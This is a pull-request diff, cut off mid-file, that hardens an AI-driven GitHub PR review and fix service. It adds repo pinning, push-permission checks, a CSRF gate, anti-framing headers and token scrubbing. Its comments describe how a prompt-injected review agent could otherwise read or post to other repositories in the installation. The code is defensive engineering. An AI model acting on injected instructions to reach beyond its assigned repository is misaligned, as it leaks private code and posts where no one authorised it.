### PR TITLE
Fix security findings: authz, token exfiltration, CSRF, clickjacking

### DIFF
--- a/src/agents/pr-reviewer.ts
+++ b/src/agents/pr-reviewer.ts
@@ -2,7 +2,13 @@
 import { useDelivery, useMcpConnection, useModel, useTool, type AgentProps } from '@flue/runtime';
 import { getConnection, resolveConnectionAuth, type ConnectionSnapshot } from '../lib/db.ts';
 import { DEFAULT_MODEL } from '../lib/personas.ts';
-import { fetchFile, fetchPr, fetchReviewThreads, makePostReview } from '../tools/github.ts';
+import {
+  makeFetchFile,
+  makeFetchPr,
+  makeFetchReviewThreads,
+  makePostReview,
+  type RepoPin,
+} from '../tools/github.ts';
 
 // Turbodiff's one generic reviewer: every configured agent (built-in persona
 // or user-created) runs through this function. One instance per agent × PR
@@ -28,18 +34,33 @@ function parseConnections(raw: string | undefined): ConnectionSnapshot[] {
   }
 }
 
-function deliveryConfig(): { agentName: string; model: string; connections: ConnectionSnapshot[] } {
+// The dispatched PR ("owner/name#123" attribute) — pins every GitHub tool to
+// that one repository, so a prompt-injected model can't point them elsewhere
+// in the installation.
+function parsePin(raw: string | undefined): RepoPin {
+  const match = raw?.match(/^([\w.-]+)\/([\w.-]+)#\d+$/);
+  return match ? { owner: match[1], repo: match[2] } : null;
+}
+
+function deliveryConfig(): {
+  agentName: string;
+  model: string;
+  connections: ConnectionSnapshot[];
+  pin: RepoPin;
+} {
   const delivery = useDelivery();
   if (delivery.kind === 'signal' && delivery.type === 'review.request' && delivery.attributes) {
     return {
       agentName: delivery.attributes.agent_name || 'Code Review',
       model: delivery.attributes.model || DEFAULT_MODEL,
       connections: parseConnections(delivery.attributes.connections),
+      pin: parsePin(delivery.attributes.pull_request),
     };
   }
   // Pre-multi-agent conversations and manual test prompts arrive as plain
-  // user messages; run them as the default reviewer.
-  return { agentName: 'Code Review', model: DEFAULT_MODEL, connections: [] };
+  // user messages; run them as the default reviewer. No dispatch attributes
+  // to pin from — this path is operator-only (REVIEW_SECRET on /internal).
+  return { agentName: 'Code Review', model: DEFAULT_MODEL, connections: [], pin: null };
 }
 
 // Step 0 finding (@flue/runtime 2.0.3's node_modules/.../types-*.d.mts):
@@ -76,12 +97,12 @@ export function PrReviewer(props: AgentProps) {
   // pi-ai bump adds adaptive thinking.
   useModel(cfg.model, { thinkingLevel: 'off' });
 
-  useTool(fetchPr);
-  useTool(fetchFile);
-  useTool(fetchReviewThreads);
+  useTool(makeFetchPr(cfg.pin));
+  useTool(makeFetchFile(cfg.pin));
+  useTool(makeFetchReviewThreads(cfg.pin));
   // post_review closes over the instance id so completing the D1 review row
   // can never hit another agent's concurrent review of the same PR.
-  useTool(makePostReview(props.id));
+  useTool(makePostReview(props.id, cfg.pin));
 
   // The agent's configured external MCP servers (e.g. an Executor catalog).
   // Tokens stay sealed in D1: the auth resolver decrypts per request, so

--- a/src/app.ts
+++ b/src/app.ts
@@ -51,6 +51,26 @@ const startedAt = Date.now();
 const app = new Hono();
 const reviewer = createAgentRouter(PrReviewer);
 
+// Baseline security headers. Every HTML page — the cockpit shell above all —
+// refuses framing: the Merge/Abandon buttons are session-authed clickjacking
+// targets, and cookie SameSite rules do not gate framing. Script/style
+// sources stay unrestricted (the shell uses inline styles and Google Fonts);
+// frame-ancestors is the load-bearing directive here. nosniff goes on every
+// response so uploaded artifacts are never content-sniffed into something
+// executable.
+app.use('*', async (c, next) => {
+  await next();
+  c.res.headers.set('x-content-type-options', 'nosniff');
+  if (c.res.headers.get('content-type')?.includes('text/html')) {
+    c.res.headers.set(
+      'content-security-policy',
+      "frame-ancestors 'none'; base-uri 'self'; object-src 'none'",
+    );
+    c.res.headers.set('x-frame-options', 'DENY');
+    c.res.headers.set('referrer-policy', 'same-origin');
+  }
+});
+
 app.get('/healthz', async (c) => {
   try {
     await env.DB.prepare('SELECT 1').run();

--- a/src/lib/auth.ts
+++ b/src/lib/auth.ts
@@ -1,7 +1,7 @@
 import { env } from 'cloudflare:workers';
 import type { Context } from 'hono';
 import { auth, type AuthUser } from './better-auth.ts';
-import { fetchUserInstallationIds } from './github-app.ts';
+import { fetchUserCanPush, fetchUserInstallationIds } from './github-app.ts';
 
 // Request-time authorization on top of better-auth sessions. The session
 // (who you are) is durable and only ends by explicit sign-out or 30-day
@@ -14,6 +14,9 @@ import { fetchUserInstallationIds } from './github-app.ts';
 export type AuthedUser = {
   session: { userId: number; login: string; ghToken: string };
   installationIds: number[];
+  // Local DEV_FAKE_INSTALLATIONS session — no GitHub token to verify repo
+  // permissions with, so permission checks pass by construction.
+  devFake?: boolean;
 };
 
 // Per-isolate caches. Entries are tiny (a token string / a handful of ids);
@@ -64,6 +67,38 @@ async function installationIds(userId: string, ghToken: string): Promise<number[
   return null;
 }
 
+// Whether GitHub says this user can push to the repo, checked with the
+// user's own token (GET /repos/:owner/:repo reports the caller's
+// permissions). Installation membership alone is NOT write permission —
+// GitHub lists an org installation for members with read-only access to any
+// covered repo — so routes that write to a repo or change its factory
+// posture must pass this too. Fail-closed: no token or a failed GitHub call
+// denies. These checks guard explicit clicks, not the 5s polling reads, so
+// a rare rate-limit blip surfaces as a retryable 403 rather than becoming a
+// lingering grant.
+const REPO_PERM_TTL_MS = 5 * 60_000;
+const repoPermCache = new Map<string, { push: boolean; fetchedAt: number }>();
+
+export async function userCanPushToRepo(
+  user: AuthedUser,
+  owner: string,
+  name: string,
+): Promise<boolean> {
+  if (user.devFake) return true;
+  const { userId, ghToken } = user.session;
+  if (!ghToken) return false;
+  const key = `${userId}:${owner}/${name}`;
+  const cached = repoPermCache.get(key);
+  if (cached && Date.now() - cached.fetchedAt < REPO_PERM_TTL_MS) return cached.push;
+  try {
+    const push = await fetchUserCanPush(ghToken, owner, name);
+    repoPermCache.set(key, { push, fetchedAt: Date.now() });
+    return push;
+  } catch {
+    return false;
+  }
+}
+
 export async function requireUser(c: Context): Promise<AuthedUser | null> {
   // Local-only escape hatch for developing the signed-in UI without GitHub
   // OAuth: DEV_FAKE_INSTALLATIONS="1001,1002" in .dev.vars signs you in as
@@ -78,6 +113,7 @@ export async function requireUser(c: Context): Promise<AuthedUser | null> {
         .split(',')
         .map(Number)
         .filter((n) => Number.isInteger(n)),
+      devFake: true,
     };
   }
   const found = await auth().api.getSession({ headers: c.req.raw.headers });

--- a/src/lib/automation-workflow.ts
+++ b/src/lib/automation-workflow.ts
@@ -225,8 +225,10 @@ export class AutomationWorkflow extends WorkflowEntrypoint<unknown, AutomationPa
             { automationRunId: ctx.runId },
           );
           if (!agent.success) {
+            // Scrubbed: this message persists to automation_runs.error and
+            // renders in the dashboard for every installation member.
             throw new Error(
-              `automation agent exited ${agent.exitCode}: ${`${agent.stdout}\n${agent.stderr}`.trim().slice(-1_000)}`,
+              `automation agent exited ${agent.exitCode}: ${scrub(`${agent.stdout}\n${agent.stderr}`.trim()).slice(-1_000)}`,
             );
           }
           const status = await sandbox.exec(`git -C ${WORK} status --porcelain`);

--- a/src/lib/conflict-resolver.ts
+++ b/src/lib/conflict-resolver.ts
@@ -68,7 +68,9 @@ ${files.map((f) => `- ${f}`).join('\n')}
 // fix-attempt cap, resolve the conflict, and record the attempt. Never
 // throws — a failed run is recorded and reported on the PR, not retried, so
 // a broken run can't spend tokens again on redelivery.
-export async function processResolveConflictMessage(msg: ConflictResolveQueueMessage): Promise<void> {
+export async function processResolveConflictMessage(
+  msg: ConflictResolveQueueMessage,
+): Promise<void> {
   const repo = await getRepoById(msg.repoId);
   if (!repo || !repo.enabled || repo.auto_resolve_conflicts !== 1) {
     console.log(
@@ -115,7 +117,9 @@ export async function processResolveConflictMessage(msg: ConflictResolveQueueMes
   try {
     const outcome = await runConflictResolve(repo, msg.prNumber, mergeability.baseRef, attemptId);
     await finishFixAttempt(attemptId, outcome.status, outcome.commit);
-    console.log(`turbodiff: conflict resolution ${outcome.status} for ${label} (attempt ${attemptId})`);
+    console.log(
+      `turbodiff: conflict resolution ${outcome.status} for ${label} (attempt ${attemptId})`,
+    );
     // A conflict-resolution push invalidates prior verification evidence,
     // same as a fix push: re-verify so the report and the auto-merge gate
     // reflect the merged code.
@@ -154,12 +158,13 @@ async function runConflictResolve(
     { sleepAfter: '20m' },
   );
 
-  const gitEnv = { GIT_TOKEN: gitToken, FIX_BRANCH: headRef };
+  const gitEnv = { GIT_TOKEN: gitToken, FIX_BRANCH: headRef, BASE_REF: baseRef };
   const pushMerge = async (): Promise<string> => {
-    const push = await sandbox.exec(`git -C ${CLONE_DIR} push origin HEAD:"$FIX_BRANCH"`, {
-      env: gitEnv,
-      timeout: 2 * 60_000,
-    });
+    const push = await sandbox.exec(
+      `git -C ${CLONE_DIR} push ` +
+        `"https://x-access-token:$GIT_TOKEN@github.com/${headRepo}.git" HEAD:"$FIX_BRANCH"`,
+      { env: gitEnv, timeout: 2 * 60_000 },
+    );
     if (!push.success) {
       throw new Error(`git push failed: ${scrub(push.stderr).slice(0, 500)}`);
     }
@@ -174,21 +179,35 @@ async function runConflictResolve(
   if (!clone.success) {
     throw new Error(`git clone failed: ${scrub(clone.stderr).slice(0, 500)}`);
   }
+  // The clone URL (token included) lands in .git/config — strip it before
+  // anything else runs in the checkout. The resolution agent and the repo's
+  // check command both execute untrusted repo content with network egress,
+  // so the token must not be readable from disk during either; fetch and
+  // push below supply it via env to explicit-URL commands instead (git
+  // anonymizes those URLs in FETCH_HEAD and merge messages).
   await sandbox.exec(
-    `git -C ${CLONE_DIR} config user.name "turbodiff[bot]" && ` +
+    `git -C ${CLONE_DIR} remote set-url origin "https://github.com/${headRepo}.git" && ` +
+      `git -C ${CLONE_DIR} config user.name "turbodiff[bot]" && ` +
       `git -C ${CLONE_DIR} config user.email "turbodiff[bot]@users.noreply.github.com"`,
   );
 
   try {
-    const fetchBase = await sandbox.exec(`git -C ${CLONE_DIR} fetch origin "${baseRef}" --depth 50`, {
-      env: gitEnv,
-      timeout: 3 * 60_000,
-    });
+    // Explicit refspec into refs/remotes/origin so `merge origin/<base>`
+    // resolves regardless of the single-branch clone's configured refspec.
+    const fetchBase = await sandbox.exec(
+      `git -C ${CLONE_DIR} fetch --depth 50 ` +
+        `"https://x-access-token:$GIT_TOKEN@github.com/${headRepo}.git" ` +
+        `"+refs/heads/$BASE_REF:refs/remotes/origin/$BASE_REF"`,
+      { env: gitEnv, timeout: 3 * 60_000 },
+    );
     if (!fetchBase.success) {
       throw new Error(`git fetch of base branch failed: ${scrub(fetchBase.stderr).slice(0, 500)}`);
     }
 
-    const merge = await sandbox.exec(`git -C ${CLONE_DIR} merge "origin/${baseRef}" --no-edit`, {
+    // Ref name via env, not interpolation — ref names may legally contain
+    // characters the shell would evaluate inside double quotes.
+    const merge = await sandbox.exec(`git -C ${CLONE_DIR} merge "origin/$BASE_REF" --no-edit`, {
+      env: { BASE_REF: baseRef },
       timeout: 60_000,
     });
 
@@ -200,12 +219,16 @@ async function runConflictResolve(
       return { status: 'fixed', commit };
     }
 
-    const conflicted = (await sandbox.exec(`git -C ${CLONE_DIR} diff --name-only --diff-filter=U`)).stdout
+    const conflicted = (
+      await sandbox.exec(`git -C ${CLONE_DIR} diff --name-only --diff-filter=U`)
+    ).stdout
       .split('\n')
       .map((l) => l.trim())
       .filter(Boolean);
     if (conflicted.length === 0) {
-      throw new Error(`git merge failed with no conflicted files: ${scrub(merge.stderr).slice(0, 500)}`);
+      throw new Error(
+        `git merge failed with no conflicted files: ${scrub(merge.stderr).slice(0, 500)}`,
+      );
     }
 
     await sandbox.writeFile(
@@ -236,9 +259,13 @@ async function runConflictResolve(
       },
     );
     const fullOutput = scrub(`${agent.stdout}\n${agent.stderr}`.trim());
-    await persistAgentLog('resolve_conflict', fullOutput, agent.success, { fixAttemptId: attemptId });
+    await persistAgentLog('resolve_conflict', fullOutput, agent.success, {
+      fixAttemptId: attemptId,
+    });
     if (!agent.success) {
-      throw new Error(`conflict resolution agent exited ${agent.exitCode}: ${fullOutput.slice(-1_000)}`);
+      throw new Error(
+        `conflict resolution agent exited ${agent.exitCode}: ${fullOutput.slice(-1_000)}`,
+      );
     }
 
     const stillConflicted = (
@@ -259,7 +286,10 @@ async function runConflictResolve(
     }
 
     if (repo.check_command) {
-      const tests = await sandbox.exec(repo.check_command, { cwd: CLONE_DIR, timeout: TEST_TIMEOUT_MS });
+      const tests = await sandbox.exec(repo.check_command, {
+        cwd: CLONE_DIR,
+        timeout: TEST_TIMEOUT_MS,
+      });
       if (!tests.success) {
         return { status: 'tests_failed' };
       }
@@ -269,9 +299,12 @@ async function runConflictResolve(
     await postConflictResolvedComment(token, repo.owner, repo.name, prNumber, commit.slice(0, 8));
     return { status: 'fixed', commit };
   } finally {
-    // Scrub the token-embedded remote URL so an idle sandbox (sleepAfter
-    // keeps it warm) never holds a usable credential after this run ends.
-    await sandbox.exec(`git -C ${CLONE_DIR} remote set-url origin "https://github.com/${headRepo}.git"`);
+    // Belt and braces: the remote was already scrubbed right after clone,
+    // but an idle sandbox (sleepAfter keeps it warm) must never hold a
+    // usable credential, so re-assert it on every exit path.
+    await sandbox.exec(
+      `git -C ${CLONE_DIR} remote set-url origin "https://github.com/${headRepo}.git"`,
+    );
   }
 }
 

--- a/src/lib/fixer.ts
+++ b/src/lib/fixer.ts
@@ -247,8 +247,14 @@ export async function runFix(params: FixParams): Promise<FixOutcome> {
   if (!clone.success) {
     throw new Error(`git clone failed: ${scrub(clone.stderr).slice(0, 500)}`);
   }
+  // The clone URL (token included) lands in .git/config — strip it before
+  // anything else runs in the checkout. Both the agent and the repo's own
+  // check command execute untrusted repo content with network egress, so the
+  // token must not be readable from disk during either; the push below
+  // supplies it via env to an explicit-URL command instead.
   await sandbox.exec(
-    `git -C ${CLONE_DIR} config user.name "turbodiff[bot]" && ` +
+    `git -C ${CLONE_DIR} remote set-url origin "https://github.com/${headRepo}.git" && ` +
+      `git -C ${CLONE_DIR} config user.name "turbodiff[bot]" && ` +
       `git -C ${CLONE_DIR} config user.email "turbodiff[bot]@users.noreply.github.com"`,
   );
 
@@ -331,10 +337,11 @@ export async function runFix(params: FixParams): Promise<FixOutcome> {
       }
     }
 
-    const push = await sandbox.exec(`git -C ${CLONE_DIR} push origin HEAD:"$FIX_BRANCH"`, {
-      env: gitEnv,
-      timeout: 2 * 60_000,
-    });
+    const push = await sandbox.exec(
+      `git -C ${CLONE_DIR} push ` +
+        `"https://x-access-token:$GIT_TOKEN@github.com/${headRepo}.git" HEAD:"$FIX_BRANCH"`,
+      { env: gitEnv, timeout: 2 * 60_000 },
+    );
     if (!push.success) {
       throw new Error(`git push failed: ${scrub(push.stderr).slice(0, 500)}`);
     }
@@ -356,8 +363,9 @@ export async function runFix(params: FixParams): Promise<FixOutcome> {
       agentOutput,
     };
   } finally {
-    // Scrub the token-embedded remote URL so an idle sandbox (sleepAfter
-    // keeps it warm) never holds a usable credential after this run ends.
+    // Belt and braces: the remote was already scrubbed right after clone,
+    // but an idle sandbox (sleepAfter keeps it warm) must never hold a
+    // usable credential, so re-assert it on every exit path.
     await sandbox.exec(
       `git -C ${CLONE_DIR} remote set-url origin "https://github.com/${headRepo}.git"`,
     );

--- a/src/lib/generation-workflow.ts
+++ b/src/lib/generation-workflow.ts
@@ -277,8 +277,10 @@ export class GenerationWorkflow extends WorkflowEntrypoint<unknown, GenerationPa
             { featureId },
           );
           if (!agent.success) {
+            // Scrubbed: this message persists to features.error and renders
+            // in the dashboard for every installation member.
             throw new Error(
-              `generation agent exited ${agent.exitCode}: ${`${agent.stdout}\n${agent.stderr}`.trim().slice(-1_000)}`,
+              `generation agent exited ${agent.exitCode}: ${scrub(`${agent.stdout}\n${agent.stderr}`.trim()).slice(-1_000)}`,
             );
           }
           const status = await sandbox.exec(`git -C ${WORK} status --porcelain`);

--- a/src/lib/github-app.ts
+++ b/src/lib/github-app.ts
@@ -212,6 +212,25 @@ export async function fetchUserInstallationIds(token: string): Promise<number[]>
   return data.installations.map((i) => i.id);
 }
 
+// The caller's own permission on one repository: GET /repos/:owner/:repo with
+// a user token includes a `permissions` block for the authenticated user.
+// Push (write) is the bar for factory write actions — the same bar GitHub
+// itself applies to merging PRs and pushing branches.
+export async function fetchUserCanPush(
+  token: string,
+  owner: string,
+  repo: string,
+): Promise<boolean> {
+  const data = await userApi<{
+    permissions?: { admin?: boolean; maintain?: boolean; push?: boolean };
+  }>(token, `/repos/${owner}/${repo}`);
+  return (
+    data.permissions?.push === true ||
+    data.permissions?.maintain === true ||
+    data.permissions?.admin === true
+  );
+}
+
 // Acknowledge a comment-triggered review with an emoji reaction (👀 while
 // dispatching). Requires the App's Issues permission to be read & write.
 export async function reactToIssueComment(

--- a/src/lib/mcp-oauth.ts
+++ b/src/lib/mcp-oauth.ts
@@ -42,6 +42,25 @@ async function fetchJson(url: string): Promise<Record<string, unknown> | null> {
   }
 }
 
+// Discovered URLs come from the MCP server's own metadata — attacker-
+// influenced if that server is malicious or later compromised. They become a
+// browser redirect target (authorization endpoint) and the POST target for
+// the auth code + client secret (token endpoint), so require https; plain
+// http only for local development targets, mirroring validConnectionUrl in
+// the API layer.
+function assertSecureUrl(raw: string, label: string): void {
+  let url: URL;
+  try {
+    url = new URL(raw);
+  } catch {
+    throw new Error(`discovered ${label} is not a valid URL`);
+  }
+  const localDev = url.protocol === 'http:' && ['localhost', '127.0.0.1'].includes(url.hostname);
+  if (url.protocol !== 'https:' && !localDev) {
+    throw new Error(`discovered ${label} must be an https:// URL, got: ${url.protocol}`);
+  }
+}
+
 export async function discoverOAuthEndpoints(mcpServerUrl: string): Promise<OAuthEndpoints> {
   const origin = new URL(mcpServerUrl).origin;
 
@@ -53,6 +72,7 @@ export async function discoverOAuthEndpoints(mcpServerUrl: string): Promise<OAut
   const servers = resource?.authorization_servers;
   const authServer =
     Array.isArray(servers) && typeof servers[0] === 'string' ? (servers[0] as string) : origin;
+  assertSecureUrl(authServer, 'authorization server');
 
   // RFC 8414, falling back to OpenID Connect discovery for authorization
   // servers that only publish that document.
@@ -66,10 +86,13 @@ export async function discoverOAuthEndpoints(mcpServerUrl: string): Promise<OAut
       `could not discover OAuth endpoints for ${authServer} (no oauth-authorization-server or openid-configuration metadata)`,
     );
   }
+  assertSecureUrl(authorizationEndpoint, 'authorization endpoint');
+  assertSecureUrl(tokenEndpoint, 'token endpoint');
   const registrationEndpoint =
     typeof metadata?.registration_endpoint === 'string'
       ? metadata.registration_endpoint
       : undefined;
+  if (registrationEndpoint) assertSecureUrl(registrationEndpoint, 'registration endpoint');
   return { authorizationEndpoint, tokenEndpoint, registrationEndpoint };
 }
 

--- a/src/routes/api.ts
+++ b/src/routes/api.ts
@@ -96,7 +96,7 @@ import {
   type TaskRepoStatusRow,
 } from '../lib/db.ts';
 import { computeNextRunAt } from '../lib/automation-schedule.ts';
-import { requireUser, type AuthedUser } from '../lib/auth.ts';
+import { requireUser, userCanPushToRepo, type AuthedUser } from '../lib/auth.ts';
 import { certificateUrl } from '../lib/certificate.ts';
 import { syncInstallationRepos } from '../lib/repo-sync.ts';
 import { approvePlan } from '../lib/planner.ts';
@@ -442,8 +442,41 @@ async function authorizedAutomation(c: Context<ApiEnv>): Promise<AutomationRow |
   return automation;
 }
 
+// Push (write) permission on the repo, verified against GitHub with the
+// caller's own token. Installation membership (the read gate on every route)
+// is deliberately weaker: GitHub reports an org installation to read-only
+// members too, and the write routes below act with the App installation
+// token — which carries the App's permissions, not the caller's. Anything
+// that writes to the repo or changes how code reaches it re-checks the
+// caller's real GitHub permission first. Null when allowed; the 403 to
+// return otherwise.
+async function requireRepoPush(
+  c: Context<ApiEnv>,
+  repo: { owner: string; name: string },
+): Promise<Response | null> {
+  if (await userCanPushToRepo(c.get('user'), repo.owner, repo.name)) return null;
+  return c.json({ error: 'push access to the repository is required for this action' }, 403);
+}
+
 export function createApiRoutes() {
   const app = new Hono<ApiEnv>();
+
+  // CSRF gate for the cookie-authed data plane: browsers attach Origin to
+  // every POST (same-origin and cross-site alike), so a mismatched Origin is
+  // a forged cross-site request regardless of cookie SameSite behavior —
+  // this must not silently regress if the cookie config ever changes.
+  // Requests without an Origin header pass: a non-browser client sends the
+  // cookie only if it already holds it, which is not CSRF.
+  const SAFE_METHODS = new Set(['GET', 'HEAD', 'OPTIONS']);
+  app.use('*', async (c, next) => {
+    if (!SAFE_METHODS.has(c.req.method)) {
+      const origin = c.req.header('origin');
+      if (origin && origin !== new URL(c.req.url).origin) {
+        return c.json({ error: 'cross-origin request rejected' }, 403);
+      }
+    }
+    await next();
+  });
 
   app.use('*', async (c, next) => {
     const user = await requireUser(c);
@@ -982,6 +1015,11 @@ export function createApiRoutes() {
     if (!repo.auto_fix) {
       return c.json({ error: 'enable auto-fix for this repo before submitting comments' }, 409);
     }
+    // The fix run pushes commits to the PR branch with a write-scoped token
+    // and executes the repo's check command — dispatching it requires the
+    // same push permission GitHub would demand to push those commits.
+    const denied = await requireRepoPush(c, repo);
+    if (denied) return denied;
     const claimed = await dispatchOpenCockpitComments(feature.id);
     if (claimed.length === 0) {
       return c.json({ error: 'no pending comments to submit' }, 400);
@@ -1040,6 +1078,12 @@ export function createApiRoutes() {
   const UPLOAD_MAX_BYTES = 10 * 1024 * 1024;
 
   app.post('/uploads', async (c) => {
+    // Signed-in is not enough: any GitHub account authenticates even with
+    // zero installations. Attachments exist to feed planning runs, so
+    // require at least one installation before accepting bytes into R2.
+    if (c.get('user').installationIds.length === 0) {
+      return c.json({ error: 'install the GitHub App before uploading attachments' }, 403);
+    }
     const body = await c.req.parseBody();
     const file = body.file;
     if (!(file instanceof File))
@@ -1082,7 +1126,9 @@ export function createApiRoutes() {
   });
 
   // Human-initiated merge from the cockpit. Deliberately does not reuse the
-  // auto-merge gates: a signed-in repo admin clicking Merge IS the authority.
+  // auto-merge gates: a signed-in user with verified push permission clicking
+  // Merge IS the authority (requireRepoPush — the App-token fallback below
+  // must never hand merge rights to someone GitHub wouldn't let push).
   // Merged with the clicking user's own OAuth token when possible so GitHub
   // attributes the merge to them, not turbodiff[bot]; falls back to the App
   // installation token when the user token can't merge (missing push
@@ -1095,10 +1141,18 @@ export function createApiRoutes() {
       return c.json({ error: 'unknown feature' }, 404);
     }
     if (!feature.pr_number) return c.json({ error: 'no pull request yet' }, 409);
+    const denied = await requireRepoPush(c, repo);
+    if (denied) return denied;
     const appToken = await installationToken(repo.installation_id);
-    const mergeability = await checkMergeability(appToken, repo.owner, repo.name, feature.pr_number, {
-      retryOnUnknown: true,
-    });
+    const mergeability = await checkMergeability(
+      appToken,
+      repo.owner,
+      repo.name,
+      feature.pr_number,
+      {
+        retryOnUnknown: true,
+      },
+    );
     if (mergeability.hasConflict) {
       if (repo.auto_resolve_conflicts === 1) {
         const msg: ConflictResolveQueueMessage = {
@@ -1110,7 +1164,10 @@ export function createApiRoutes() {
         return c.json({ ok: true, conflict: true, resolving: true });
       }
       return c.json(
-        { error: 'merge blocked — this PR has a merge conflict with the base branch', conflict: true },
+        {
+          error: 'merge blocked — this PR has a merge conflict with the base branch',
+          conflict: true,
+        },
         409,
       );
     }
@@ -1149,6 +1206,10 @@ export function createApiRoutes() {
       return c.json({ error: 'unknown feature' }, 404);
     }
     if (!feature.pr_number) return c.json({ error: 'no pull request yet' }, 409);
+    // Same bar as Merge: closing PRs and deleting branches via the App-token
+    // fallback must not exceed what GitHub lets the caller do directly.
+    const denied = await requireRepoPush(c, repo);
+    if (denied) return denied;
     const appToken = await installationToken(repo.installation_id);
     const userToken = c.get('user').session.ghToken;
     const closePath = `/repos/${repo.owner}/${repo.name}/pulls/${feature.pr_number}`;
@@ -1180,7 +1241,10 @@ export function createApiRoutes() {
         if (!userToken) {
           console.warn(`turbodiff: branch delete failed for feature ${id}:`, err);
         } else {
-          console.warn(`turbodiff: user-token branch delete failed for feature ${id}, retrying as app:`, err);
+          console.warn(
+            `turbodiff: user-token branch delete failed for feature ${id}, retrying as app:`,
+            err,
+          );
           try {
             await gh(appToken, deletePath, { method: 'DELETE' });
             branchDeleted = true;
@@ -1948,10 +2012,16 @@ export function createApiRoutes() {
     });
   });
 
-  // One PATCH for every repo toggle plus the check command.
+  // One PATCH for every repo toggle plus the check command. These flip the
+  // repo's security posture (blocking reviews, auto-fix, auto-merge) and
+  // check_command is shell that later runs in the fix sandbox — so beyond
+  // installation membership this demands verified push permission, the same
+  // bar as the merge these toggles can automate.
   app.patch('/repos/:id', async (c) => {
     const repo = await authorizedRepo(c);
     if (!repo) return c.json({ error: 'unknown repository' }, 404);
+    const denied = await requireRepoPush(c, repo);
+    if (denied) return denied;
     const body = await c.req
       .json<{
         enabled?: boolean;
@@ -1983,6 +2053,8 @@ export function createApiRoutes() {
   app.put('/repos/:id/agents/:agentId', async (c) => {
     const repo = await authorizedRepo(c);
     if (!repo) return c.json({ error: 'unknown repository' }, 404);
+    const denied = await requireRepoPush(c, repo);
+    if (denied) return denied;
     const agentId = Number(c.req.param('agentId'));
     const agent = Number.isInteger(agentId) ? await getAgentById(agentId) : null;
     if (!agent || agent.installation_id !== repo.installation_id) {
@@ -1999,6 +2071,8 @@ export function createApiRoutes() {
   app.put('/repos/:id/skills/:skillId', async (c) => {
     const repo = await authorizedRepo(c);
     if (!repo) return c.json({ error: 'unknown repository' }, 404);
+    const denied = await requireRepoPush(c, repo);
+    if (denied) return denied;
     const skillId = Number(c.req.param('skillId'));
     const skill = Number.isInteger(skillId) ? await getSkillById(skillId) : null;
     if (!skill || skill.installation_id !== repo.installation_id) {

--- a/src/tools/github.ts
+++ b/src/tools/github.ts
@@ -7,6 +7,26 @@ import { installationToken } from '../lib/github-app.ts';
 
 export type PostReviewTool = ReturnType<typeof makePostReview>;
 
+// The repository a review dispatch is scoped to. The model supplies
+// owner/repo as tool arguments, and tokenFor resolves a full installation
+// token — so without this pin a prompt-injected agent could read files from
+// (or post reviews to) any other repo in the same installation. Null only on
+// the operator-driven plain-message path (REVIEW_SECRET-authed /internal),
+// which has no dispatch attributes to pin from.
+export type RepoPin = { owner: string; repo: string } | null;
+
+function assertPinned(pin: RepoPin, owner: string, repo: string): void {
+  if (!pin) return;
+  if (
+    owner.toLowerCase() !== pin.owner.toLowerCase() ||
+    repo.toLowerCase() !== pin.repo.toLowerCase()
+  ) {
+    throw new Error(
+      `this review is scoped to ${pin.owner}/${pin.repo} — refusing to access ${owner}/${repo}`,
+    );
+  }
+}
+
 const API = 'https://api.github.com';
 const MAX_DIFF_CHARS = 300_000;
 const MAX_FILE_CHARS = 60_000;
@@ -99,76 +119,82 @@ function filterDiffNoise(diff: string): string {
     .join('');
 }
 
-export const fetchPr = defineTool({
-  name: 'fetch_pr',
-  description:
-    'Fetch a pull request: its title, description, author, branch info, and the full unified diff. ' +
-    'Call this first to see what the PR changes. Large diffs are truncated with a marker; noise ' +
-    'files (lockfiles, minified assets, source maps, generated code) are omitted and replaced ' +
-    'with per-file markers.',
-  input: v.object({
-    owner: v.string(),
-    repo: v.string(),
-    number: v.number(),
-  }),
-  async run({ data }) {
-    interface PrMeta {
-      title: string;
-      body: string | null;
-      user: { login: string } | null;
-      base: { ref: string };
-      head: { ref: string; sha: string };
-      draft: boolean;
-      changed_files: number;
-      additions: number;
-      deletions: number;
-    }
-    const token = await tokenFor(data.owner, data.repo);
-    const base = `/repos/${data.owner}/${data.repo}/pulls/${data.number}`;
-    const [meta, diff] = await Promise.all([
-      gh(token, base).then((r) => r.json() as Promise<PrMeta>),
-      gh(token, base, { accept: 'application/vnd.github.v3.diff' }).then((r) => r.text()),
-    ]);
-    return {
-      output: {
-        title: meta.title,
-        body: meta.body ?? '',
-        author: meta.user?.login ?? 'unknown',
-        baseRef: meta.base.ref,
-        headRef: meta.head.ref,
-        headSha: meta.head.sha,
-        draft: meta.draft,
-        changedFiles: meta.changed_files,
-        additions: meta.additions,
-        deletions: meta.deletions,
-        diff: truncate(filterDiffNoise(diff), MAX_DIFF_CHARS, 'diff'),
-      },
-    };
-  },
-});
+// Per-render factories (like makePostReview): each dispatch pins its tools
+// to the PR's own repository.
+export const makeFetchPr = (pin: RepoPin) =>
+  defineTool({
+    name: 'fetch_pr',
+    description:
+      'Fetch a pull request: its title, description, author, branch info, and the full unified diff. ' +
+      'Call this first to see what the PR changes. Large diffs are truncated with a marker; noise ' +
+      'files (lockfiles, minified assets, source maps, generated code) are omitted and replaced ' +
+      'with per-file markers.',
+    input: v.object({
+      owner: v.string(),
+      repo: v.string(),
+      number: v.number(),
+    }),
+    async run({ data }) {
+      assertPinned(pin, data.owner, data.repo);
+      interface PrMeta {
+        title: string;
+        body: string | null;
+        user: { login: string } | null;
+        base: { ref: string };
+        head: { ref: string; sha: string };
+        draft: boolean;
+        changed_files: number;
+        additions: number;
+        deletions: number;
+      }
+      const token = await tokenFor(data.owner, data.repo);
+      const base = `/repos/${data.owner}/${data.repo}/pulls/${data.number}`;
+      const [meta, diff] = await Promise.all([
+        gh(token, base).then((r) => r.json() as Promise<PrMeta>),
+        gh(token, base, { accept: 'application/vnd.github.v3.diff' }).then((r) => r.text()),
+      ]);
+      return {
+        output: {
+          title: meta.title,
+          body: meta.body ?? '',
+          author: meta.user?.login ?? 'unknown',
+          baseRef: meta.base.ref,
+          headRef: meta.head.ref,
+          headSha: meta.head.sha,
+          draft: meta.draft,
+          changedFiles: meta.changed_files,
+          additions: meta.additions,
+          deletions: meta.deletions,
+          diff: truncate(filterDiffNoise(diff), MAX_DIFF_CHARS, 'diff'),
+        },
+      };
+    },
+  });
 
-export const fetchFile = defineTool({
-  name: 'fetch_file',
-  description:
-    'Fetch the full contents of one file from the repository at a given ref (branch or commit SHA). ' +
-    'Use this when the diff alone lacks context — e.g. to see the whole function or module a hunk touches. ' +
-    'Use the PR headSha to read the changed version, or the base branch name for the original.',
-  input: v.object({
-    owner: v.string(),
